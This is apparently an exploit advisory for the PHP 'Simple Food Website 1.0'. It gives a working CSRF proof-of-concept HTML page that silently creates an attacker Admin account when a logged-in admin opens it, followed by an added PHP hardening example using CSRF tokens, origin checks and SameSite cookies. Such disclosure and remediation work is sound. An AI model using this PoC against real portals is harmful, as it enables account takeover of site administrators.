csrf
# Exploit Title: Simple Food Website 1.0 : Account Takeover via CSRF
### Date: 25-04-2022
### Exploit Author: Saket Saurav
### Vendor Homepage: https://www.sourcecodester.com/php/12510/simple-food-website-php.html
### Software Link: https://www.sourcecodester.com/download-code?nid=12510&title=Simple+Food+Website+%28CMS%29+in+PHP+with+Source+Code
### Version: 1.0
### Tested on: Kali Linux 2020
### Description: The attacker sends a specially crafted HTML page to the admin. If the admin opens it while logged in to the web portal in the same browser session, the page submits a request that adds the attacker's user to the portal as an Admin, taking over the admin account.
Below is the POC (exploit.html):

```html
<html>
  <!-- CSRF PoC - generated by saket saurav -->
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/food/admin/save_user.php" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="full_name" value="csrf user" />
      <input type="hidden" name="username" value="csrf" />
      <input type="hidden" name="password" value="csrf" />
      <input type="hidden" name="position" value="Admin" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```
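The PoC works because `save_user.php` accepts any POST that carries the admin's session cookie, with nothing tying the request to a form the application itself rendered. The following is an added example of how such a handler can be hardened; it is not code from Simple Food Website or from the advisory author. It uses the synchronizer-token pattern (a per-session random token embedded in the legitimate form and checked with `hash_equals` before any state change), an Origin/Referer host check as defence in depth, and a `SameSite=Lax` session cookie. The constant `ALLOWED_HOST`, the field name `csrf_token` and the placeholder comment where the original user-creation logic would run are assumptions for illustration.

```php
<?php
// Hardened save_user.php (added example, not the project's own code).
// Assumed: the portal is served from ALLOWED_HOST; adjust to the deployment.
const ALLOWED_HOST = '127.0.0.1';

// SameSite=Lax stops the session cookie being attached to a cross-site POST
// (PHP >= 7.3 for the array form of session_set_cookie_params).
session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true]);
session_start();

// Returns the session-bound anti-CSRF token, creating it on first use.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time comparison of the submitted token against the session token.
function csrf_valid(?string $submitted): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    return $expected !== '' && is_string($submitted) && hash_equals($expected, $submitted);
}

// Defence in depth: a cross-site form post carries a foreign Origin (or "null"
// from a file:// page); fail closed when neither Origin nor Referer is present.
function same_origin(array $server, string $allowedHost): bool
{
    $src = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    if ($src === '') {
        return false;
    }
    $host = parse_url($src, PHP_URL_HOST);
    return is_string($host) && strcasecmp($host, $allowedHost) === 0;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!same_origin($_SERVER, ALLOWED_HOST) || !csrf_valid($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Request rejected: missing or invalid CSRF token');
    }
    // ... the existing user-creation logic runs only after both checks pass ...
}
?>
<!-- The legitimate admin form carries the token; the attacker's page cannot read it. -->
<form action="save_user.php" method="POST" enctype="multipart/form-data">
  <input type="hidden" name="csrf_token"
         value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') ?>" />
  <input type="text" name="full_name" />
  <input type="text" name="username" />
  <input type="password" name="password" />
  <input type="text" name="position" />
  <input type="submit" value="Save" />
</form>
```

With this in place, the PoC's form post from the attacker's page arrives without a valid `csrf_token` (and, under `SameSite=Lax`, without the session cookie at all), so the handler returns 403 before any user is created. A blocked request with a foreign `Origin` against an admin endpoint is also a useful signal to log and alert on.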